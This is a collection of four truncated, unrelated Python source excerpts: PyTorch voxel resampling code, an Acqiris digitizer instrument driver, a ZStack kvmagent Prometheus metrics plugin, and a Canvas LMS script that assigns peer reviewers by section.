torch.ones_like(xyzlist[:,:,0])*sx lylist = torch.ones_like(xyzlist[:,:,0])*sy lzlist = torch.ones_like(xyzlist[:,:,0])*sz lenlist = torch.stack([lxlist, lylist, lzlist], dim=2) # cube this size rotlist = torch.zeros_like(xyzlist) # no rot boxlist = torch.cat([xyzlist, lenlist, rotlist], dim=2) # boxlist is B x 1 x 9 lrtlist = utils_geom.convert_boxlist_to_lrtlist(boxlist) lrt = lrtlist.squeeze(1) # lrt is B x 19 xyz_zoom = self.Ref2Zoom(xyz_ref, lrt, Z, Y, X, additive_pad=0.0) vox = self.get_occupancy(xyz_zoom, Z, Y, X) # vox = torch.zeros([B, 1, Z, Y, X]).float().cpu() # for b in list(range(B)): # vox[b] = self.get_occupancy_single(xyz_zoom[b].cpu(), Z, Y, X) # vox = vox.cuda() # return the lrt also, so that we can convert from here back to ref coords (with Zoom2Ref) return vox, lrt def resample_to_target_views(occRs, camRs_T_camPs): # resample to the target view # occRs is B x S x Y x X x Z x 1 # camRs_T_camPs is B x S x 4 x 4 B, S, _, Z, Y, X = list(occRs.shape) # we want to construct a mat memR_T_memP cam_T_mem = self.get_ref_T_mem(B, Z, Y, X) mem_T_cam = self.get_mem_T_ref(B, Z, Y, X) cams_T_mems = cam_T_mem.unsqueeze(1).repeat(1, S, 1, 1) mems_T_cams = mem_T_cam.unsqueeze(1).repeat(1, S, 1, 1) cams_T_mems = torch.reshape(cams_T_mems, (B*S, 4, 4)) mems_T_cams = torch.reshape(mems_T_cams, (B*S, 4, 4)) camRs_T_camPs = torch.reshape(camRs_T_camPs, (B*S, 4, 4)) memRs_T_memPs = torch.matmul(torch.matmul(mems_T_cams, camRs_T_camPs), cams_T_mems) memRs_T_memPs = torch.reshape(memRs_T_memPs, (B, S, 4, 4)) occRs, valid = resample_to_view(occRs, memRs_T_memPs, multi=True) return occRs, valid def resample_to_target_view(occRs, camR_T_camP): B, S, Z, Y, X, _ = list(occRs.shape) cam_T_mem = self.get_ref_T_mem(B, Z, Y, X) mem_T_cam = self.get_mem_T_ref(B, Z, Y, X) memR_T_memP = torch.matmul(torch.matmul(mem_T_cam, camR_T_camP), cam_T_mem) occRs, valid = resample_to_view(occRs, memR_T_memP, multi=False) return occRs, valid def resample_to_view(feats, new_T_old, multi=False): # feats is B x S x c x Y x X x Z # it represents some scene features in reference/canonical coordinates # we want to go from these coords to some target coords # new_T_old is B x 4 x 4 # it represents a transformation between two "mem" systems # or if multi=True, it's B x S x 4 x 4 B, S, C, Z, Y, X = list(feats.shape) # we want to sample for each location in the bird grid # xyz_mem = gridcloud3d(B, Z, Y, X) grid_y, grid_x, grid_z = meshgrid3d(B, Z, Y, X) # these are B x BY x BX x BZ # these represent the mem grid coordinates # we need to convert these to pixel coordinates x = torch.reshape(grid_x, [B, -1]) y = torch.reshape(grid_y, [B, -1]) z = torch.reshape(grid_z, [B, -1]) # these are B x N xyz_mem = torch.stack([x, y, z], dim=2) # this is B x N x 3 xyz_mems = xyz_mem.unsqueeze(1).repeat(1, S, 1, 1) # this is B x S x N x 3 xyz_mems_ = xyz_mems.view(B*S, Y*X*Z, 3) feats_ = feats.view(B*S, C, Z, Y, X) if multi: new_T_olds
#!/usr/bin/env python import AcqirisWrapper as Aq import InstrumentDriver from InstrumentConfig import InstrumentQuantity import numpy as np # for long integer py2/py3 compatibility from builtins import int class Error(Exception): pass class Driver(InstrumentDriver.InstrumentWorker): """ This class implements the Acqiris card driver""" def performOpen(self, options={}): """Perform the operation of opening the instrument connection""" # init object self.dig = None self.timeout = self.dComCfg['Timeout'] # keep track of sampled traces, elements are I, Q, signal, single shot self.lTrace = [np.array([]), np.array([]), 0.0, np.array([], dtype=complex)] self.lSignalNames = ['Ch1 - Data', 'Ch2 - Data', 'Signal', 'Signal - Single shot'] self.dt = 1.0 try: # open connection self.dig = Aq.AcqirisDigitizer() self.dig.init(self.comCfg.address, True, True) except Exception as e: # re-cast afdigitizer errors as a generic communication error msg = str(e) raise InstrumentDriver.CommunicationError(msg) def performClose(self, bError=False, options={}): """Perform the close instrument connection operation""" # check if digitizer object exists try: if self.dig is None: # do nothing, object doesn't exist (probably was never opened) return except: # never return error here, do nothing, object doesn't exist return try: # close and remove object self.dig.close() self.dig.closeAll() del self.dig except: # never return error here pass def performSetValue(self, quant, value, sweepRate=0.0, options={}): """Perform the Set Value instrument operation. This function should return the actual value set by the instrument""" # start with setting current quant value quant.setValue(value) # get values from relevant quants if quant.name == 'Acquisition type': mode = int(quant.getCmdStringFromValue(value)) self.dig.configMode(mode) # update # of samples parameter, since it may change when averaging self.readValueFromOther('Number of samples') elif quant.name in ('Number of samples', 'Number of segments'): # first, single trace cfg, get values from relevant quants and set all nSample = int(self.getValue('Number of samples')) nSegment = int(self.getValue('Number of segments')) self.dig.configMemory(nSample, nSegment) # set averager settings if quant.name == 'Number of samples': self.dig.configAvgConfig(1, 'NbrSamples', int(value)) self.dig.configAvgConfig(2, 'NbrSamples', int(value)) elif quant.name == 'Number of segments': self.dig.configAvgConfig(1, 'NbrSegments', int(value)) self.dig.configAvgConfig(2, 'NbrSegments', int(value)) elif quant.name == 'Number of averages': self.dig.configAvgConfig(1, 'NbrWaveforms', int(value)) self.dig.configAvgConfig(2, 'NbrWaveforms', int(value)) elif quant.name in ('Sample interval', 'Delay time'): sampInterval = self.getValue('Sample interval') delayTime = self.getValue('Delay time') # set single trace or sample interval self.dig.configHorizontal(sampInterval, delayTime) if quant.name == 'Delay time': # for averaging mode, set delay in data points self.dig.configAvgConfig(1, 'StartDelay', int(value/sampInterval)) self.dig.configAvgConfig(2, 'StartDelay', int(value/sampInterval)) elif quant.name in ('Trig source', 'Trig coupling', 'Trig slope', 'Trig level'): # get values from relevant quants and set all trigSource = int(self.getCmdStringFromValue('Trig source')) trigCoupling = int(self.getCmdStringFromValue('Trig coupling')) trigSlope = int(self.getCmdStringFromValue('Trig slope')) trigLevel = self.getValue('Trig level') # trig level is in percentage if trig is Ch1/Ch2, convert to voltage if trigSource == 1: fullRange = float(self.getCmdStringFromValue('Ch1 - Range')) offset = float(self.getValue('Ch1 - Offset')) trigLevel = 100*(0.5 - (offset + fullRange/2.0 - trigLevel)/fullRange) elif trigSource == 2: fullRange = float(self.getCmdStringFromValue('Ch2 - Range')) offset = float(self.getValue('Ch2 - Offset')) trigLevel = 100*(0.5 - (offset + fullRange/2.0 - trigLevel)/fullRange) else: # trig level is in millivolt trigLevel = trigLevel*1000.0 self.dig.configTrigSource(trigSource, trigCoupling, trigSlope, trigLevel, trigLevel2=0.0) # change active trigger if source was changed if quant.name == 'Trig source': dPattern = {1: int(0x00000001), 2: int(0x00000002), -1: int(0x80000000)} self.dig.configTrigClass(dPattern[trigSource]) elif quant.name in ('10 MHz Reference'): # get values from relevant quants and set all clockType = int(self.getCmdStringFromValue('10 MHz Reference')) self.dig.configExtClock(clockType) elif quant.name == 'Ch1 - Enabled': # do nothing for enabling/disabling pass elif quant.name in ('Ch1 - Coupling', 'Ch1 - Bandwidth', 'Ch1 - Range', 'Ch1 - Offset'): # get values from relevant quants and set all fullScale = float(self.getCmdStringFromValue('Ch1 - Range')) offset = float(self.getValue('Ch1 - Offset')) coupling = int(self.getCmdStringFromValue('Ch1 - Coupling')) bandwidth = int(self.getCmdStringFromValue('Ch1 - Bandwidth')) self.dig.configVertical(1, fullScale, -offset, coupling, bandwidth) # re-set trigger level, if needed (to reflect new offset/range) trigSource = int(self.getCmdStringFromValue('Trig source')) if trigSource == 1: trigLev = float(self.getValue('Trig level')) self.sendValueToOther('Trig level', trigLev) elif quant.name == 'Ch2 - Enabled': # do nothing pass elif quant.name in ('Ch2 - Coupling', 'Ch2 - Bandwidth', 'Ch2 - Range', 'Ch2 - Offset'): # get values from relevant quants and set all fullScale = float(self.getCmdStringFromValue('Ch2 - Range')) offset = float(self.getValue('Ch2 - Offset')) coupling = int(self.getCmdStringFromValue('Ch2 - Coupling')) bandwidth = int(self.getCmdStringFromValue('Ch2 - Bandwidth')) self.dig.configVertical(2, fullScale, -offset, coupling, bandwidth) # re-set trigger level, if needed (to reflect new offset/range) trigSource = int(self.getCmdStringFromValue('Trig source')) if trigSource == 2: trigLev = float(self.getValue('Trig level')) self.sendValueToOther('Trig level', trigLev) elif quant.name in ('Modulation frequency', 'Skip start', 'Length', 'Use Ch2 as reference'): # do nothing for these quantities, the value will be stored in local quant pass # finish set value with get value, to make sure we catch any coercing return self.performGetValue(quant) def performGetValue(self, quant, options={}): """Perform the Get Value instrument operation""" aqType = self.getValue('Acquisition type') if quant.name == 'Acquisition type': value = quant.getValueFromCmdString(str(self.dig.getMode()[0])) elif quant.name == 'Number of samples': if aqType == 'Normal': value = float(self.dig.getMemory()[0]) else: value = float(self.dig.getAvgConfig(1, 'NbrSamples')) elif quant.name == 'Number of segments': if aqType == 'Normal': value = float(self.dig.getMemory()[1]) else: value = float(self.dig.getAvgConfig(1, 'NbrSegments')) elif quant.name == 'Number of averages': value = float(self.dig.getAvgConfig(1, 'NbrWaveforms')) elif quant.name == 'Sample interval': value = float(self.dig.getHorizontal()[0]) elif quant.name == 'Delay time': if aqType == 'Normal': value = float(self.dig.getHorizontal()[1]) else: # convert from delay in points to delay in time sampInterval = self.getValue('Sample interval') value = sampInterval * self.dig.getAvgConfig(1, 'StartDelay') elif quant.name == 'Trig source': pattern = abs(self.dig.getTrigClass()[0]) dPattern = {int(0x00000001): 1, int(0x00000002): 2, int(0x80000000): -1} value = quant.getValueFromCmdString(str(dPattern[pattern])) elif quant.name == 'Trig coupling': # get from current trig source trigSource = int(self.getCmdStringFromValue('Trig source')) value = quant.getValueFromCmdString( \ str(self.dig.getTrigSource(trigSource)[0])) elif quant.name == 'Trig slope': # get from current trig source trigSource = int(self.getCmdStringFromValue('Trig source')) value = quant.getValueFromCmdString( \ str(self.dig.getTrigSource(trigSource)[1])) elif quant.name == 'Trig level': # get from current trig source trigSource = int(self.getCmdStringFromValue('Trig source')) trigLevel = self.dig.getTrigSource(trigSource)[2] # if Ch1/Ch2, trig level is percentage of full range if trigSource == 1: fullRange = float(self.getCmdStringFromValue('Ch1 - Range')) offset = float(self.getValue('Ch1 - Offset')) value = offset + fullRange*trigLevel/100.0 elif trigSource == 2: fullRange = float(self.getCmdStringFromValue('Ch2 - Range')) offset = float(self.getValue('Ch2 - Offset')) value = offset + fullRange*trigLevel/100.0 else: # trig level is in millivolt value = trigLevel/1000.0 elif quant.name in ('10 MHz Reference'): # get values from relevant quants and set all value = quant.getValueFromCmdString(str(self.dig.getExtClock()[0])) elif quant.name == 'Ch1 - Enabled': # do nothing for enabling/disabling value = quant.getValue() elif quant.name == 'Ch1 - Coupling': value = quant.getValueFromCmdString(str(self.dig.getVertical(1)[2])) elif quant.name == 'Ch1 - Bandwidth': value = quant.getValueFromCmdString(str(self.dig.getVertical(1)[3])) elif quant.name == 'Ch1 - Range': value = quant.getValueFromCmdString('%.2f' % self.dig.getVertical(1)[0]) elif quant.name == 'Ch1 - Offset': value = - self.dig.getVertical(1)[1] elif quant.name == 'Ch2 - Enabled': # do nothing value = quant.getValue() elif quant.name == 'Ch2 - Coupling': value = quant.getValueFromCmdString(str(self.dig.getVertical(2)[2])) elif quant.name == 'Ch2 - Bandwidth': value = quant.getValueFromCmdString(str(self.dig.getVertical(2)[3])) elif quant.name == 'Ch2 - Range': value = quant.getValueFromCmdString('%.2f' % self.dig.getVertical(2)[0]) elif quant.name == 'Ch2 - Offset': value = - self.dig.getVertical(2)[1] # signals elif quant.name in self.lSignalNames: # special case for hardware looping if self.isHardwareLoop(options): value = self.getSignalHardwareLoop(quant, options) else: # no hardware loop, just get traces if first call if self.isFirstCall(options): self.getTraces(bArm=not self.isHardwareTrig(options)) # return correct data indx = self.lSignalNames.index(quant.name) if quant.name in ('Ch1 - Data', 'Ch2 - Data'): value = InstrumentQuantity.getTraceDict(self.lTrace[indx], dt=self.dt) else: value = self.lTrace[indx] elif quant.name in ('Modulation frequency', 'Skip start', 'Length', 'Use Ch2 as reference', 'Enable demodulation'): # just return the quantity value value = quant.getValue() return value def _callbackProgress(self, progress): """Report progress to server, as text string""" s = 'Acquiring traces (%.0f%%)' % (100*progress) self.reportStatus(s) def performArm(self, quant_names, options={}): """Perform the instrument arm operation""" # make sure we are arming for reading traces, if not return signal_names = ['Ch%d - Data' % (n + 1) for n in range(2)] signal_arm = [name in signal_names for name in quant_names] if not np.any(signal_arm): return # start acquisition if self.isHardwareLoop(options): (seq_no, n_seq) = self.getHardwareLoopIndex(options) nSample = int(self.getValue('Number of samples')) nAverage = int(self.getValue('Number of averages')) self.dig.getRoundRobinData(nSample, n_seq, nAverage, bConfig=True, bArm=True, bMeasure=False) else: self.getTraces(bArm=True, bMeasure=False) def getSignalHardwareLoop(self, quant, options): """Get data from round-robin type averaging""" (seq_no, n_seq) = self.getHardwareLoopIndex(options) #
<filename>kvmagent/kvmagent/plugins/prometheus.py import os.path import threading import typing from prometheus_client import start_http_server from prometheus_client.core import GaugeMetricFamily, REGISTRY from kvmagent import kvmagent from zstacklib.utils import http from zstacklib.utils import jsonobject from zstacklib.utils import lock from zstacklib.utils import lvm from zstacklib.utils import misc from zstacklib.utils import thread from zstacklib.utils.bash import * from zstacklib.utils.ip import get_nic_supported_max_speed logger = log.get_logger(__name__) collector_dict = {} # type: Dict[str, threading.Thread] latest_collect_result = {} collectResultLock = threading.RLock() QEMU_CMD = kvmagent.get_qemu_path().split("/")[-1] def read_number(fname): res = linux.read_file(fname) return 0 if not res else int(res) def collect_host_network_statistics(): all_eths = os.listdir("/sys/class/net/") virtual_eths = os.listdir("/sys/devices/virtual/net/") interfaces = [] for eth in all_eths: eth = eth.strip(' \t\n\r') if eth in virtual_eths: continue if eth == 'bonding_masters': continue elif not eth: continue else: interfaces.append(eth) all_in_bytes = 0 all_in_packets = 0 all_in_errors = 0 all_out_bytes = 0 all_out_packets = 0 all_out_errors = 0 for intf in interfaces: all_in_bytes += read_number("/sys/class/net/{}/statistics/rx_bytes".format(intf)) all_in_packets += read_number("/sys/class/net/{}/statistics/rx_packets".format(intf)) all_in_errors += read_number("/sys/class/net/{}/statistics/rx_errors".format(intf)) all_out_bytes += read_number("/sys/class/net/{}/statistics/tx_bytes".format(intf)) all_out_packets += read_number("/sys/class/net/{}/statistics/tx_packets".format(intf)) all_out_errors += read_number("/sys/class/net/{}/statistics/tx_errors".format(intf)) metrics = { 'host_network_all_in_bytes': GaugeMetricFamily('host_network_all_in_bytes', 'Host all inbound traffic in bytes'), 'host_network_all_in_packages': GaugeMetricFamily('host_network_all_in_packages', 'Host all inbound traffic in packages'), 'host_network_all_in_errors': GaugeMetricFamily('host_network_all_in_errors', 'Host all inbound traffic errors'), 'host_network_all_out_bytes': GaugeMetricFamily('host_network_all_out_bytes', 'Host all outbound traffic in bytes'), 'host_network_all_out_packages': GaugeMetricFamily('host_network_all_out_packages', 'Host all outbound traffic in packages'), 'host_network_all_out_errors': GaugeMetricFamily('host_network_all_out_errors', 'Host all outbound traffic errors'), } metrics['host_network_all_in_bytes'].add_metric([], float(all_in_bytes)) metrics['host_network_all_in_packages'].add_metric([], float(all_in_packets)) metrics['host_network_all_in_errors'].add_metric([], float(all_in_errors)) metrics['host_network_all_out_bytes'].add_metric([], float(all_out_bytes)) metrics['host_network_all_out_packages'].add_metric([], float(all_out_packets)) metrics['host_network_all_out_errors'].add_metric([], float(all_out_errors)) return metrics.values() def collect_host_capacity_statistics(): default_zstack_path = '/usr/local/zstack/apache-tomcat/webapps/zstack' zstack_env_path = os.environ.get('ZSTACK_HOME', None) if zstack_env_path and zstack_env_path != default_zstack_path: default_zstack_path = zstack_env_path zstack_dir = ['/var/lib/zstack', '%s/../../../' % default_zstack_path, '/opt/zstack-dvd/', '/var/log/zstack', '/var/lib/mysql', '/var/lib/libvirt', '/tmp/zstack'] metrics = { 'zstack_used_capacity_in_bytes': GaugeMetricFamily('zstack_used_capacity_in_bytes', 'ZStack used capacity in bytes') } zstack_used_capacity = 0 for dir in zstack_dir: if not os.path.exists(dir): continue cmd = "du -bs %s | awk {\'print $1\'}" % dir res = bash_o(cmd) zstack_used_capacity += int(res) metrics['zstack_used_capacity_in_bytes'].add_metric([], float(zstack_used_capacity)) return metrics.values() def collect_lvm_capacity_statistics(): metrics = { 'vg_size': GaugeMetricFamily('vg_size', 'volume group size', None, ['vg_name']), 'vg_avail': GaugeMetricFamily('vg_avail', 'volume group and thin pool free size', None, ['vg_name']), } r = bash_r("grep -Ev '^[[:space:]]*#|^[[:space:]]*$' /etc/multipath/wwids") if r == 0: linux.set_fail_if_no_path() r, o, e = bash_roe("vgs --nolocking --noheading -oname") if r != 0 or len(o.splitlines()) == 0: return metrics.values() vg_names = o.splitlines() for name in vg_names: name = name.strip() size, avail = lvm.get_vg_size(name, False) metrics['vg_size'].add_metric([name], float(size)) metrics['vg_avail'].add_metric([name], float(avail)) return metrics.values() def convert_raid_state_to_int(state): """ :type state: str """ state = state.lower() if state == "optimal": return 0 elif state == "degraded": return 5 else: return 100 def convert_disk_state_to_int(state): """ :type state: str """ state = state.lower() if "online" in state or "jobd" in state: return 0 elif "rebuild" in state: return 5 elif "failed" in state: return 10 elif "unconfigured" in state: return 15 else: return 100 def collect_raid_state(): metrics = { 'raid_state': GaugeMetricFamily('raid_state', 'raid state', None, ['target_id']), 'physical_disk_state': GaugeMetricFamily('physical_disk_state', 'physical disk state', None, ['slot_number', 'disk_group']), 'physical_disk_temperature': GaugeMetricFamily('physical_disk_temperature', 'physical disk temperature', None, ['slot_number', 'disk_group']), } if bash_r("/opt/MegaRAID/MegaCli/MegaCli64 -LDInfo -LALL -aAll") != 0: return metrics.values() raid_info = bash_o("/opt/MegaRAID/MegaCli/MegaCli64 -LDInfo -LALL -aAll | grep -E 'Target Id|State'").strip().splitlines() target_id = state = "unknown" for info in raid_info: if "Target Id" in info: target_id = info.strip().strip(")").split(" ")[-1] else: state = info.strip().split(" ")[-1] metrics['raid_state'].add_metric([target_id], convert_raid_state_to_int(state)) disk_info = bash_o( "/opt/MegaRAID/MegaCli/MegaCli64 -PDList -aAll | grep -E 'Slot Number|DiskGroup|Firmware state|Drive Temperature'").strip().splitlines() slot_number = state = disk_group = "unknown" for info in disk_info: if "Slot Number" in info: slot_number = info.strip().split(" ")[-1] elif "DiskGroup" in info: kvs = info.replace("Drive's position: ", "").split(",") disk_group = filter(lambda x: "DiskGroup" in x, kvs)[0] disk_group = disk_group.split(" ")[-1] elif "Drive Temperature" in info: temp = info.split(":")[1].split("C")[0] metrics['physical_disk_temperature'].add_metric([slot_number, disk_group], int(temp)) else: disk_group = "JBOD" if disk_group == "unknown" and info.count("JBOD") > 0 else disk_group disk_group = "unknown" if disk_group is None else disk_group state = info.strip().split(":")[-1] metrics['physical_disk_state'].add_metric([slot_number, disk_group], convert_disk_state_to_int(state)) return metrics.values() def collect_equipment_state(): metrics = { 'power_supply': GaugeMetricFamily('power_supply', 'power supply', None, ['ps_id']), 'ipmi_status': GaugeMetricFamily('ipmi_status', 'ipmi status', None, []), 'physical_network_interface': GaugeMetricFamily('physical_network_interface', 'physical network interface', None, ['interface_name', 'speed']), } r, ps_info = bash_ro("ipmitool sdr type 'power supply'") # type: (int, str) if r == 0: for info in ps_info.splitlines(): info = info.strip() ps_id = info.split("|")[0].strip().split(" ")[0] health = 10 if "fail" in info.lower() or "lost" in info.lower() else 0 metrics['power_supply'].add_metric([ps_id], health) metrics['ipmi_status'].add_metric([], bash_r("ipmitool mc info")) nics = bash_o("find /sys/class/net -type l -not -lname '*virtual*' -printf '%f\\n'").splitlines() if len(nics) != 0: for nic in nics: nic = nic.strip() try: # NOTE(weiw): sriov nic contains carrier file but can not read status = linux.read_file("/sys/class/net/%s/carrier" % nic) == 1 except Exception as e: status = True speed = str(get_nic_supported_max_speed(nic)) metrics['physical_network_interface'].add_metric([nic, speed], status) return metrics.values() def collect_vm_statistics(): metrics = { 'cpu_occupied_by_vm': GaugeMetricFamily('cpu_occupied_by_vm', 'Percentage of CPU used by vm', None, ['vmUuid']) } r, pid_vm_map_str = bash_ro("ps --no-headers u -C \"%s -name\" | awk '{print $2,$13}'" % QEMU_CMD) if r != 0 or len(pid_vm_map_str.splitlines()) == 0: return metrics.values() pid_vm_map_str = pid_vm_map_str.replace(",debug-threads=on", "").replace("guest=", "") '''pid_vm_map_str samples: 38149 e8e6f27bfb2d47e08c59cbea1d0488c3 38232 afa02edca7eb4afcb5d2904ac1216eb1 ''' pid_vm_map = {} for pid_vm in pid_vm_map_str.splitlines(): arr = pid_vm.split() if len(arr) == 2: pid_vm_map[arr[0]] = arr[1] def collect(vm_pid_arr): vm_pid_arr_str = ','.join(vm_pid_arr) r, pid_cpu_usages_str = bash_ro("top -b -n 1 -p %s | grep qemu | awk '{print $1,$9}'" % vm_pid_arr_str) if r != 0 or len(pid_cpu_usages_str.splitlines()) == 0: return for pid_cpu_usage in pid_cpu_usages_str.splitlines(): arr = pid_cpu_usage.split() pid = arr[0] vm_uuid = pid_vm_map[pid] cpu_usage = arr[1] metrics['cpu_occupied_by_vm'].add_metric([vm_uuid], float(cpu_usage)) n = 10 for i in range(0, len(pid_vm_map.keys()), n): collect(pid_vm_map.keys()[i:i + n]) return metrics.values() collect_node_disk_wwid_last_time = None collect_node_disk_wwid_last_result = None def collect_node_disk_wwid(): global collect_node_disk_wwid_last_time global collect_node_disk_wwid_last_result # NOTE(weiw): some storage can not afford frequent TUR. ref: ZSTAC-23416 if collect_node_disk_wwid_last_time is None: collect_node_disk_wwid_last_time = time.time() elif time.time() - collect_node_disk_wwid_last_time < 60 and collect_node_disk_wwid_last_result is not None: return collect_node_disk_wwid_last_result metrics = { 'node_disk_wwid': GaugeMetricFamily('node_disk_wwid', 'node disk wwid', None, ["disk", "wwid"]) } pvs = bash_o("pvs --nolocking --noheading -o pv_name").strip().splitlines() for pv in pvs: multipath_wwid = None if bash_r("dmsetup table %s | grep multipath" % pv) == 0: multipath_wwid = bash_o("udevadm info -n %s | grep -E '^S: disk/by-id/dm-uuid' | awk -F '-' '{print $NF}'" % pv).strip() disks = linux.get_physical_disk(pv, False) for disk in disks: disk_name = disk.split("/")[-1].strip() wwids = bash_o("udevadm info -n %s | grep -E '^S: disk/by-id' | awk -F '/' '{print $NF}' | grep -v '^lvm-pv' | sort" % disk).strip().splitlines() if multipath_wwid is not None: wwids.append(multipath_wwid) if len(wwids) > 0: metrics['node_disk_wwid'].add_metric([disk_name, ";".join([w.strip() for w in wwids])], 1) collect_node_disk_wwid_last_result = metrics.values() return metrics.values() kvmagent.register_prometheus_collector(collect_host_network_statistics) kvmagent.register_prometheus_collector(collect_host_capacity_statistics) kvmagent.register_prometheus_collector(collect_vm_statistics) kvmagent.register_prometheus_collector(collect_node_disk_wwid) if misc.isMiniHost(): kvmagent.register_prometheus_collector(collect_lvm_capacity_statistics) kvmagent.register_prometheus_collector(collect_raid_state) kvmagent.register_prometheus_collector(collect_equipment_state) class PrometheusPlugin(kvmagent.KvmAgent): COLLECTD_PATH = "/prometheus/collectdexporter/start" @kvmagent.replyerror @in_bash def start_prometheus_exporter(self, req): @in_bash def start_collectd(cmd): conf_path = os.path.join(os.path.dirname(cmd.binaryPath), 'collectd.conf') conf = '''Interval {{INTERVAL}} # version {{VERSION}} FQDNLookup false LoadPlugin syslog LoadPlugin aggregation LoadPlugin cpu LoadPlugin disk LoadPlugin interface LoadPlugin memory LoadPlugin network LoadPlugin virt <Plugin aggregation> <Aggregation> #Host "unspecified" Plugin "cpu" #PluginInstance "unspecified" Type "cpu" #TypeInstance "unspecified" GroupBy "Host" GroupBy "TypeInstance" CalculateNum false CalculateSum false CalculateAverage true CalculateMinimum false CalculateMaximum false CalculateStddev false </Aggregation> </Plugin> <Plugin cpu> ReportByCpu true ReportByState true ValuesPercentage true </Plugin> <Plugin disk> Disk "/^sd[a-z]$/" Disk "/^hd[a-z]$/" Disk "/^vd[a-z]$/" IgnoreSelected false </Plugin> <Plugin "interface"> {% for i in INTERFACES -%} Interface "{{i}}" {% endfor -%} IgnoreSelected false </Plugin> <Plugin memory> ValuesAbsolute true ValuesPercentage false </Plugin> <Plugin virt> Connection "qemu:///system" RefreshInterval {{INTERVAL}} HostnameFormat name PluginInstanceFormat name BlockDevice "/:hd[a-z]/" IgnoreSelected true ExtraStats "vcpu memory" </Plugin> <Plugin network> Server "localhost" "25826" </Plugin> ''' tmpt = Template(conf) conf = tmpt.render({ 'INTERVAL': cmd.interval, 'INTERFACES': interfaces, 'VERSION': cmd.version, }) need_restart_collectd = False if os.path.exists(conf_path): with open(conf_path, 'r') as fd: old_conf = fd.read() if old_conf != conf: with open(conf_path, 'w') as fd: fd.write(conf) need_restart_collectd = True else: with open(conf_path, 'w') as fd: fd.write(conf) need_restart_collectd = True cpid = linux.find_process_by_command('collectd', [conf_path]) mpid = linux.find_process_by_command('collectdmon', [conf_path]) if not cpid: bash_errorout('collectdmon -- -C %s' % conf_path) else: bash_errorout('kill -TERM %s' % cpid) if need_restart_collectd: if not mpid: bash_errorout('collectdmon -- -C %s' % conf_path) else: bash_errorout('kill -HUP %s' % mpid) else: if not mpid: bash_errorout('collectdmon -- -C %s' % conf_path) def run_in_systemd(binPath, args, log): def get_systemd_name(path): if "collectd_exporter" in path: return "collectd_exporter" elif "node_exporter" in path: return "node_exporter" elif "pushgateway" in path: return "pushgateway" def reload_and_restart_service(service_name): bash_errorout("systemctl daemon-reload && systemctl restart %s.service" % service_name) service_name = get_systemd_name(binPath) service_path = '/etc/systemd/system/%s.service' % service_name service_conf = ''' [Unit] Description=prometheus %s After=network.target [Service] ExecStart=/bin/sh -c '%s %s > %s 2>&1' ExecStop=/bin/sh -c 'pkill -TERM -f %s' Restart=always RestartSec=30s [Install] WantedBy=multi-user.target ''' % (service_name, binPath, args, '/dev/null' if log.endswith('/pushgateway.log') else log, binPath) if not os.path.exists(service_path): linux.write_file(service_path, service_conf, True) os.chmod(service_path, 0644) reload_and_restart_service(service_name) return if linux.read_file(service_path) != service_conf: linux.write_file(service_path, service_conf, True) logger.info("%s.service conf changed" % service_name) os.chmod(service_path, 0644) # restart
<filename>assign-random-peer-reviewer-by-section.py<gh_stars>10-100 #!/usr/bin/python3 # -*- coding: utf-8 -*- # -*- mode: python; python-indent-offset: 4 -*- # # ./assign-random-peer-reviewer-by-section.py course_id new_assignment_id [old_assignment_id ] # # This program assigns each user in a course (course_id) with a randomly assigned peer reviewer from within their section for a given assignment (new_assignment). # Note that this program ignores all sections that do not have a single quote or the word "section" in them. # # Note also that there are some permutations that cannot meet the above two conditions and the additional condition of not having a person assigned # to review two different persons. In this case the program tries with a new starting permutation. It will try up to 99 times before giving # up doing peer reviewing assignments for this section. I know this is an arbitrary number, but hope that it works in practice. # # Example: # # ./assign-random-peer-reviewer-by-section.py --testing 28715 159758 # ./assign-random-peer-reviewer-by-section.py 28850 160120 # # ./assign-random-peer-reviewer-by-section.py 28715 159753 # # <NAME> Jr. # # 2021.09.16 based on earlier copy-peer-reviewer-assignments.py program # import requests, time from pprint import pprint import optparse import sys import json import random ############################# ###### EDIT THIS STUFF ###### ############################# global baseUrl # the base URL used for access to Canvas global header # the header for all HTML requests global payload # place to store additionally payload when needed for options to HTML requests # Based upon the options to the program, initialize the variables used to access Canvas gia HTML requests def initialize(options): global baseUrl, header, payload # styled based upon https://martin-thoma.com/configuration-files-in-python/ if options.config_filename: config_file=options.config_filename else: config_file='config.json' try: with open(config_file) as json_data_file: configuration = json.load(json_data_file) access_token=configuration["canvas"]["access_token"] if options.containers: baseUrl="http://"+configuration["canvas"]["host"]+"/api/v1" print("using HTTP for the container environment") else: baseUrl="https://"+configuration["canvas"]["host"]+"/api/v1" header = {'Authorization' : 'Bearer ' + access_token} payload = {} except: print("Unable to open configuration file named {}".format(config_file)) print("Please create a suitable configuration file, the default name is config.json") sys.exit() ############################################################################## ## ONLY update the code below if you are experimenting with other API calls ## ############################################################################## def summarize_assignments(list_of_assignments): summary_of_assignments={} for assignm in list_of_assignments: summary_of_assignments[assignm['id']]=assignm['name'] print("summary_of_assignments={}".format(summary_of_assignments)) def list_assignments(course_id): assignments_found_thus_far=[] # Use the Canvas API to get the list of assignments for the course #GET /api/v1/courses/:course_id/assignments url = "{0}/courses/{1}/assignments".format(baseUrl, course_id) if Verbose_Flag: print("url: {}".format(url)) r = requests.get(url, headers = header) if Verbose_Flag: print("result of getting assignments: {}".format(r.text)) if r.status_code == requests.codes.ok: page_response=r.json() for p_response in page_response: assignments_found_thus_far.append(p_response) # the following is needed when the reponse has been paginated # i.e., when the response is split into pieces - each returning only some of the list of modules # see "Handling Pagination" - Discussion created by <EMAIL> on Apr 27, 2015, https://community.canvaslms.com/thread/1500 while r.links.get('next', False): r = requests.get(r.links['next']['url'], headers=header) page_response = r.json() for p_response in page_response: assignments_found_thus_far.append(p_response) return assignments_found_thus_far def list_peer_reviews(course_id, assignment_id): reviews_found_thus_far=[] # Use the Canvas API to get the list of peer reviwes for the course # GET /api/v1/courses/:course_id/assignments/:assignment_id/peer_reviews url = "{0}/courses/{1}/assignments/{2}/peer_reviews".format(baseUrl, course_id, assignment_id) if Verbose_Flag: print("url: {}".format(url)) r = requests.get(url, headers = header) if Verbose_Flag: print("result of getting peer reviews: {}".format(r.text)) if r.status_code == requests.codes.ok: page_response=r.json() for p_response in page_response: reviews_found_thus_far.append(p_response) # the following is needed when the reponse has been paginated # i.e., when the response is split into pieces - each returning only some of the list of modules # see "Handling Pagination" - Discussion created by <EMAIL> on Apr 27, 2015, https://community.canvaslms.com/thread/1500 if 'link' in r.headers: while r.links.get('next', False): r = requests.get(r.links['next']['url'], headers=header) page_response = r.json() for p_response in page_response: 